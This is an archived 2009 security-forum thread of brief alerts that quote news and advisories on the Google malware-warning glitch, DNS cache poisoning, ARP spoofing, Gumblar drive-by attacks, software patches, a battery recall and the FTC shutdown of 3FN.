Old Alerts

Google broken... maybe back up now?

FYI...

- http://isc.sans.org/diary.html?storyid=5779
Last Updated: 2009-01-31 18:17:26 UTC - "... it appears to be reporting that every site might contain malware (i.e. it shows the "This site may harm your computer" warning with every result)...UPDATE X3: Google's reponse*..."

Google: This Internet May Harm Your Computer
- http://voices.washingtonpost.com/securityfix/2009/01/google_this_internet_will_harm.html
January 31, 2009 - "A glitch in a computer security program embedded deeply into Google's search engine briefly prevented users of the popular search engine from visiting any Web sites turned up in search results this morning. Instead, Google users were redirected to page that warned: "This site may harm your computer"..."
* http://googleblog.blogspot.com/2009/01/this-site-may-harm-your-computer-on.html
January 31, 2009 - "...the URL of '/' was mistakenly checked in as a value to the file and '/' expands to all URLs. Fortunately, our on-call site reliability team found the problem quickly and reverted the file. Since we push these updates in a staggered and rolling fashion, the errors began appearing between 6:27 a.m. and 6:40 a.m. and began disappearing between 7:10 and 7:25 a.m., so the duration of the problem for any particular user was approximately 40 minutes..."
- http://blog.stopbadware.org/2009/01/31/google-glitch-causes-confusion
January 31, 2009 - "...Users who attempted to click through the results saw the "interstitial" warning page that mentions the possibility of badware and refers people to StopBadware.org for more information. This led to a denial of service of our website, as millions of Google users attempted to visit our site for more information... [Update 2:35] Hopefully this will be the last update, as Google has acknowledged the error, apologized to its customers, and fixed the problem. As many know, we have a strong relationship with Google, which is a sponsor and partner of StopBadware.org. The mistake in Google’s initial statement, indicating that we supply them with badware data, is a common misperception. We appreciate their follow up efforts in clarifying the relationship on their blog and with the media. Despite today’s glitch, we continue to support Google’s effort to proactively warn users of badware sites, and our experience is that they are committed to doing so as accurately and as fairly as possible..."

:spider::lip::red:
 
DNS spoofing vuln...

FYI...

- http://preview.tinyurl.com/cjkx72
February 20, 2009 (Computerworld) - "...nearly one-third of the estimated 200,000 DNS servers worldwide still remain unprotected against the cache-poisoning threat and need to be patched as soon as possible, Kaminsky said, adding that many of them are being attacked on a daily basis. "We are seeing attacks where people are redirecting major sites to places where they shouldn't be going," he said. "It's happening right now." The cache-poisoning flaw was publicly disclosed last July... The flaw could be used by attackers to spoof DNS traffic, potentially enabling them to redirect Web traffic and e-mail messages to systems under their control..."

Web-based DNS Randomness Test
- https://www.dns-oarc.net/oarc/services/dnsentropy
Test My DNS

...and if you are still having problems, try this:
- http://www.opendns.com/

.
 
IBM server bug [Seagate/SATA drives] could cause Data Loss

FYI...

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=215600307
March 2, 2009 - "IBM said a recent firmware update could cause the Seagate disk drives on more than two dozen models of its business servers to fail, leading to a situation that could cause customers to lose access to critical corporate data. In a current support bulletin*, the company said the bug affects a range of models in its BladeCenter, xSeries, and System x lines of servers. "After a power cycle, the SATA drive is no longer available and becomes unresponsive," IBM warned. "Data may become inaccessible due to the drive not responding," according to the bulletin, which lists numerous IBM server configurations at risk from the problem. IBM said customers should use the ServeRAID manager or other tools to determine their disk drive model and firmware. IBM said it plans to fix the problem in a firmware update "scheduled for first quarter 2009." The company did not offer further specifics on a release date. The update, when available, will be accessible as a download from IBM's System x support Web site... IBM said the warning applies to server products sold worldwide."
* http://preview.tinyurl.com/c8fy3l
Last modified: 2009-02-18

:fear::sad::fear:
 
Massive ARP spoofing attacks on websites

FYI...

- http://isc.sans.org/diary.html?storyid=6001
Last Updated: 2009-03-11 00:34:49 UTC - "...attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet...
ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets... The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary. The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying...
A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites...
AV detection rates were similarly poor (in the mean time they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help)..."

(More detail at the ISC URL above.)

> http://en.wikipedia.org/wiki/ARP_spoofing

:fear::fear:
 
New rogue-DHCP server malware

FYI...

- http://isc.sans.org/diary.html?storyid=6025
Last Updated: 2009-03-16 19:49:12 UTC - "...new version of rogue DHCP server malware... The malware appears to be similar to Trojan.Flush.M which was found last December. Like back then, after infecting its target, the malware installs a rogue DHCP server. The main goal of the DHCP server is to spread a bad DNS server IP address... summary of the differences:
• The new version sets the DHCP lease time to 1 hour.
• It sets the MAC destination to the broadcast address, rather then the MAC address of the DHCP client.
• It does not specify a DNS Domain Name.
• The options field does not contain an END option followed by PAD options.
• Unlike Trojan.Flush.M, the BootP Broadcast Bit is set.

The malicious DNS server is 64.86.133.51 and 63.243.173.162.
Recommendation: Monitor connections to DNS servers other then the approved one pushed out by your DHCP server. This should help you spot this kind of malware. Yes, you can block the two IP addresses listed above, but it will likely do little good."

:fear::fear:
 
Last edited:
Lotus Notes & Symantec advisories - vuln "wp6sr.dll"

FYI...

- http://www.us-cert.gov/current/index.html#autonomy_keyview_sdk_vulnerability
March 18, 2009 - "US-CERT is aware of reports of a vulnerability that affects the Autonomy KeyView SDK wp6sr.dll library. This library is used by certain products, including Lotus Notes and Symantec, to support the handling of Word Perfect documents. By convincing a user to open a specially crafted Word Perfect document with an application using the affected Autonomy KeyView SDK library, a remote attacker may be able to execute arbitrary code...
• IBM Lotus Notes users should review the IBM Flash Alert and implement the listed fixes or workarounds.
http://www-01.ibm.com/support/docview.wss?uid=swg21377573
• Symantec users should review Symantec Security Advisory SYM09-004 and implement the listed fixes or workarounds.
http://www.symantec.com/avcenter/security/Content/2009.03.17a.html
• Registered Autonomy Users should review the related Autonomy alert (login required).
https://customers.autonomy.com/supp...SDK/10.4/kv_update_nti40_10.4.zip.readme.html ..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4564
Last revised: 03/20/2009
CVSS v2 Base Score: 9.3 (HIGH)

:fear:
 
Last edited:
Thunderbird v2.0.0.21 released

FYI...

Thunderbird v2.0.0.21 released
- http://www.mozillamessaging.com/en-US/thunderbird/
March 18, 2009

Fixed in Thunderbird 2.0.0.21
- http://www.mozilla.org/security/known-vulnerabilities/thunderbird20.html#thunderbird2.0.0.21
MFSA 2009-10 Upgrade PNG library to fix memory safety hazards
MFSA 2009-09 XML data theft via RDFXMLDataSource and cross-domain redirect
MFSA 2009-07 Crashes with evidence of memory corruption (rv:1.9.0.7)
MFSA 2009-01 Crashes with evidence of memory corruption (rv:1.9.0.6)

- http://secunia.com/advisories/33802/2/
Last Update: 2009-03-20
Critical: Highly critical
Impact: Security Bypass, Exposure of sensitive information, DoS, System access
Where: From remote
Solution Status: Vendor Patch ...
Solution: Update to version 2.0.0.21...
CVE reference:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0040
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0352
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0353
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0772
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0774
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0776

:fear:
 
IBM ActiveX vuln...

FYI...

IBM Access Support ActiveX control stack buffer overflow
- http://www.kb.cert.org/vuls/id/340420
Date Last Updated: 2009-03-25 - "... IBM Access Support ActiveX control, which is provided by IbmEgath.dll, contains a stack buffer overflow in the GetXMLValue() method. We have confirmed that version 3.20.284.0 is vulnerable. Other versions may also contain the flaw.
... Impact: By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash.
... Solution: We are currently unaware of a practical solution to this problem. Please consider the following workarounds: Disable the IBM Access Support ActiveX control in Internet Explorer
The vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: {74FFE28D-2378-11D5-990C-006094235084} ..."

- http://secunia.com/advisories/34470/2/
Critical: Highly critical
Solution Status: Unpatched...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0215
Last revised: 03/25/2009
CVSS v2 Base Score:9.3 (HIGH)...

:fear:
 
DNS providers under attack

FYI...

- http://isc.sans.org/diary.html?storyid=6121
Last Updated: 2009-04-03 21:35:44 UTC - "We've been keeping an eye on the issues affecting the domain servers of Register.com. Several readers have written to us with concerns ofer the lack of availability of Register.com's servers, which seem to have been under a DDoS attack. There are also reports that DNS provider NeuStar (UltraDNS) may be under DDoS, too. We don't have any information at the moment about these incidents, beyond what is reported in the following articles:
- http://www.theinquirer.net/inquirer/news/638/1051638/register-com-suffers-dos-attack
- http://www.scmagazineus.com/DDoS-attacks-hit-major-web-services/article/130060/
Register.com issues are causing lots of issues across the web. One reader told us, "We are struggling to keep our websites available. DNS is the problem. We are being told by Register.com that the April 1 issues are affecting them. It sounds like they are being DOS'd and are filtering certain ISPs from querying them." Another reader said, "Register.com's DNS servers have gone offline for the second time in 24 hours. They were down yesterday from about 15:45 - 18:45 and just went down again today at about 14:30 (all times EST)..."

- http://isc.sans.org/diary.html?storyid=6121
Last Updated: 2009-04-04 02:53:13 UTC ...(Version: 2)
"Update: ... We are using all available means to restore services to every one of our customers and halt this criminal attack on our business and our customers’ business. We are working round the clock to make that happen. We are committed to updating you in as timely manner as possible, please check your inbox or our website for additional updates.
Thank you for your patience.
Larry Kutscher
Chief Executive Officer
Register.com"

:fear::fear:
 
Last edited:
AT&T cables cut - Silicon Valley...

FYI...

- http://blog.wired.com/27bstroke6/2009/04/cable-sabotage.html
April 09, 2009 | 3:58:39 PM - "Deliberate sabotage is being blamed for a sizable internet and telephone service outage Thursday in Silicon Valley. At 1:30 a.m., someone opened a manhole cover on a railroad right-of-way in San Jose, climbed down and cut four AT&T fiber optic cables. A second AT&T cable, and a Sprint cable, were cut in the same manner two hours later, farther north in San Carlos. Service for Sprint, Verizon and AT&T customers in the southern San Francisco Bay Area has been lost, according to the San Francisco Chronicle*. Police departments have put more units on the street, because nobody can call 9-1-1. A much smaller Comcast outage affecting around 4,500 customers in San Jose began at around 1:00 p.m. Pacific time. Spokesman Andrew Johnson says the company is investigating the cause.
Update: AT&T is offering a $100,000 reward** for information leading to the arrest and conviction of the vandal."

* http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2009/04/09/BAP816VTE6.DTL&tsp=1
April 10, 2009 - "... Ten fiber-optic cables... were cut at four locations in the predawn darkness..."

AT&T Offering $100,000 Reward in Bay Area Network Vandalism
** http://www.att.com/gen/press-room?pid=4800&cdvn=news&newsarticleid=26715
April 9, 2009

:mad::mad::mad:
 
Last edited:
Sysinternals updates 3 apps

FYI... http://isc.sans.org/diary.html?storyid=6373

- http://technet.microsoft.com/sysinternals/bb963902.aspx
Autoruns v9.5: This update to Autoruns, a powerful autostart manager, adds display of audio and video codecs, which are gaining popularity as an extension mechanism used by malware to gain automatic execution.
- http://technet.microsoft.com/sysinternals/bb897544.aspx
PsLoglist v2.7: This version of PsLoglist, a command-line event log display utility, now properly displays event log entries for default event log sources on Windows Vista and higher and accepts wildcard matching for event sources.
- http://technet.microsoft.com/sysinternals/bb897553.aspx
PsExec v1.95: This version of PsExec, a utility for executing applications remotely, fixes an issue that prevented the -i (interactive) switch from working on Windows XP systems with a recent hotfix and includes a number of minor bug fixes.

May 08, 2009

:bigthumb:
 
Google buggy...

FYI...

- http://googleblog.blogspot.com/2009/05/this-is-your-pilot-speaking-now-about.html
5/14/2009 - "... An error in one of our systems caused us to direct some of our web traffic through Asia, which created a traffic jam. As a result, about 14% of our users experienced slow services or even interruptions. We've been working hard to make our services ultrafast and "always on," so it's especially embarrassing when a glitch like this one happens. We're very sorry that it happened, and you can be sure that we'll be working even harder to make sure that a similar problem won't happen again..."

- http://isc.sans.org/diary.html?storyid=6388
Last Updated: 2009-05-14 22:36:04 UTC ...(Version: -13-)

- http://asert.arbornetworks.com/2009/05/the-great-googlelapse/
May 14th, 2009 at 4:36 pm

:fear::spider::confused:
 
Last edited:
Google-focused Gumblar.cn mal-script website hijacks

FYI...

- http://preview.tinyurl.com/rbxxwa
May 14, 2009 PC World - "A new round of website hijacks is attempting to install malicious, Google-focused software on unpatched PCs, according to security company ScanSafe, further cementing the drive-by-download approach as a bad-guy tactic of choice. The attack, dubbed "Gumblar" by ScanSafe*, starts by hijacking legitimate sites and inserting attack code. The more than 1,500 hacked sites, including Tennis.com and Variety.com, don't represent an especially huge number, but it's growing rapidly. Since last week, the attack has grown by 80 percent, according to the company, and has spiked 188 percent since yesterday.
The inserted attack code attempts to identify old, unpatched vulnerabilities on a victim PC that browses a hacked site, and will take advantage of any discovered hole to install malware. These kinds of drive-by-download attacks are sneaky and dangerous, but the good news is that while the actual exploits used vary as time passes, the company says none have yet gone after zero-day holes that don't yet have a fix available. The attack code has largely gone after PDF and Flash flaws discovered in the last year..."
* http://blog.scansafe.com/journal/2009/5/14/gumblar-qa.html

- http://www.theregister.co.uk/2009/05/14/viral_web_infection/
14 May 2009 - "... The exploit code is unique for every website, making it impossible to identify a compromised site until someone has accidentally surfed there. It uses obfuscated Javascript that's burrowed deep into a website's source code to exploit unpatched vulnerabilities in a visitor's Adobe Flash and Reader programs. Victims then join a botnet that manipulates their Google search results... By injecting ads and links into certain searches, infected users see results that are different than they would otherwise be..."

- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=217500218
May 14, 2009 - "... difficult to find and bring down... its source IP addresses have been traced to Latvia and Russia, and its servers are located in the U.K..."

Gumblar .cn exploit
- http://preview.tinyurl.com/r5cplm
07 May 09 (Unmask Parasites blog)

More Facts about the Gumblar attack
- http://preview.tinyurl.com/qg5c8d
15 May 09 (Unmask Parasites blog)

Troj/JSRedir-R attacks
- http://www.sophos.com/blogs/sophoslabs/v/post/4422
May 14, 2009

http://google.com/safebrowsing/diagnostic?site=gumblar.cn/
"... Malicious software includes 24 scripting exploit(s), 6 trojan(s)... site has hosted malicious software over the past 90 days. It infected 12799 domain(s)..."

:fear::mad:
 
Last edited:
HP recalls 70,000 Notebook batteries due to Fire Hazard

FYI...

- http://www.cpsc.gov/cpscpub/prerel/prhtml09/09221.html
May 14, 2009 - "... recall of the following consumer product. Consumers should stop using recalled products immediately unless otherwise instructed.
Name of Product: Lithium-Ion batteries used in Hewlett-Packard and Compaq notebook computers
Units: About 70,000
Importer: Hewlett-Packard Co., of Palo Alto, Calif.
Hazard: The recalled lithium-ion batteries can overheat, posing a fire and burn hazard to consumers..."
(HP Pavilion, Compaq Presario, HP, HP Compaq - see link above for specific models)

- http://www.theinquirer.net/inquirer/news/1137353/hp-recalls-lithium-ion-batteries
15 May 2009 - "... Hewlett-Packard is voluntarily recalling about 70,000 lithium-ion batteries that shipped with several models of its HP and Compaq laptops. Nine models of HP Pavilions, nine models of Compaq Presarios, two HP laptop models, and one HP Compaq laptop model sold between August 2007 and March 2008 all shipped with the dodgy battery... HP said that owners of the affected laptop models should pull the battery out of the machine and give it a ring* so it can ship a free replacement."
* http://bpr.hpordercenter.com/hbpr/M14.aspx

:fear::fear:
 
Last edited:
Gumblar/JSRedir-R drive-bys...

More...

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-18 17:54:18 UTC - "... Gumblar/JSRedir-R drive-bys. Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar. According to Sophos* this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival. Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials..."
* http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web
May 14, 2009

> http://forums.spybot.info/showpost.php?p=312220&postcount=82
 
Gumblar whac-a-Mole game continues...

FYI...

- http://preview.tinyurl.com/qlr9ba
05-19-2009 Symantec Security Response Blog - "The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains. The drive-by download tries to exploit a number of underlying vulnerabilities, including some for Adobe Acrobat and Adobe Flash. Users should make sure that their systems are running the latest versions of these and other third-party applications to help mitigate the risk of being compromised.
So how is that so many websites are compromised at one time? Often it is due to SQL injection errors or direct hacking into the back end of the hosting companies, but it appears that this recent problem may be more about compromised FTP passwords that belonged to the people that administer the websites. In any case, it means the bad guys are able to continually change the malicious code until the admin changes the FTP passwords and blocks the trespassing... We expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up..."

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-19 13:02:01 UTC - "... the dropbox for this trojan, gumblar .cn has been offline since last friday, but a successor has come online, martuz .cn..."

- http://blog.scansafe.com/journal/2009/5/19/gumblar-up-another-7-martuzcn-is-down.html
May 19, 2009
- http://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html
- http://blog.scansafe.com/journal/2009/5/18/gumblar-a-botnet-of-compromised-websites.html

- http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating
May 18, 2009

:fear::fear:
 
Last edited:
QuickTime vuln - unpatched

FYI...

QuickTime vuln - unpatched
- http://secunia.com/advisories/35091/
Release Date: 2009-05-22
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Apple QuickTime 7.x ...
... The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site...
Solution: Do not browse untrusted web sites. Do not open files from untrusted sources..."

Fix/patch released:
- http://forums.spybot.info/showpost.php?p=315588&postcount=2
2009-06-01

:sad::fear:
 
Last edited:
Gumblar/Martuz/Geno attack...

FYI...

Gumblar/Martuz/Geno attack
- http://isc.sans.org/diary.html?storyid=6430
Last Updated: 2009-05-21 19:29:48 UTC - "... client side analysis* and writeup of recent gumblar malware attacks..."
* http://preview.tinyurl.com/pc26gr
May 21, 2009 InfoSec from the trenches - "... Once compromised by the Gumblar/Martuz/Geno, victims will have many pieces of malware loaded onto their machines, this malware does the following:
• Steals FTP credentials
• Sends SPAM
• Installs fake anti virus
• Highjacks Google search queries
• Disables security software
The exploits used are for Adobe Acrobat and Adobe Flash Player...
...this is a very large attack encompassing many malicious payloads..."

// http://forums.spybot.info/showpost.php?p=312220&postcount=82
 
QuickTime v7.6.2 released

FYI...

QuickTime v7.6.2 released
- http://support.apple.com/kb/HT3591
June 01, 2009 - "This document describes the security content of QuickTime 7.6.2, which can be downloaded and installed via Software Update preferences, or from Apple Downloads*..."
* http://support.apple.com/downloads/

> http://support.apple.com/kb/HT1222

- http://secunia.com/advisories/35091/2/
Last Update: 2009-06-02 <<<
Critical: Highly critical
Solution: Update to version 7.6.2...
> http://support.apple.com/downloads/QuickTime_7_6_2_for_Windows

CVE reference:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0010
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0185
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0188
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0951
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0952
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0953
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0954
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0955
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0956
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0957

Also: iTunes 8.2 released
- http://support.apple.com/kb/HT3592
June 01, 2009
> http://secunia.com/advisories/35314/2/
Release Date: 2009-06-02
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: iTunes 8.x ...
Solution: Update to version 8.2...
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0950

:fear:
 
Last edited:
FTC shuts down 3FN.net

FYI...

- http://www.theregister.co.uk/2009/06/04/3fn_shut_down/
4 June 2009 - "Federal authorities have shut down what they said was the worst US-based web hosting provider after convincing a judge it actively participated in the distribution of child pornography, spam, malware, and other net-based menaces. The US Federal Trade Commission obtained the court order against 3FN.net, a service provider with servers mostly located in San Jose, California that also operated under the name Pricewert. Dated June 2, it commanded all companies providing upstream services to 3FN to immediately pull the plug. The order was issued in secret to prevent the operators from being able to destroy evidence or find new hosts, something FTC attorneys said was necessary given the extreme nature of the data it hosted. "This content includes a witches' brew of child pornography, botnet command and control servers, spyware, viruses, trojans, phishing-related sites, and pornography featuring violence, bestiality, and incest," they wrote in court documents. "In addition to recruiting and willingly distributing this illegal, malicious and harmful content, Pricewert actively colludes with its criminal clientele in several areas, including the maintenance and deployment of networks of compromised computers known as botnets." This week's action is the most significant shutdown since the shuttering in November of McColo, another Northern California-based service provider with ties to online crime... One of the biggest complaints among white hat hackers is the difficulty of shutting down networks that flagrantly violate the law. This week's action is the first time the FTC has used its congressional mandate to protect US consumer to sever a service provider suspected of illegal activity... Court documents are available here*."
* http://www.ftc.gov/os/caselist/0923148/index.shtm

- http://news.cnet.com/8301-1009_3-10257588-83.html
June 4, 2009 - "... In its filings with the district court, the FTC estimates that more than 4,500 malicious software programs are controlled by command-and-control servers hosted by 3FN. This malware includes programs capable of keystroke logging, password and data stealing, programs with hidden backdoor remote control activity, and programs involved in spam distribution. This case was brought to light with the assistance of multiple agencies and people including NASA's Office of Inspector General; the Department of Justice's Computer Crime Division; Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham; the National Center for Missing and Exploited Children; the Shadowserver Foundation; the Spamhaus Project; and Symantec..."

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=217701956
June 4, 2009 - "... The only entity named in the case is Pricewert. Ethan Arenson, an attorney with the FTC's Bureau of Consumer Protection, said that the individuals behind the company are overseas in Eastern Europe. He declined to comment on a possible extradition effort or coordination with authorities abroad. Whether the individuals doing business as Pricewert will face charges remains an open question. Pricewert is essentially an Oregon shell corporation with some servers in San Jose..."

- http://voices.washingtonpost.com/securityfix/pushdo.htm

- http://asert.arbornetworks.com/2009/06/things-in-3fn/

:bigthumb:
 
Last edited:
Back
Top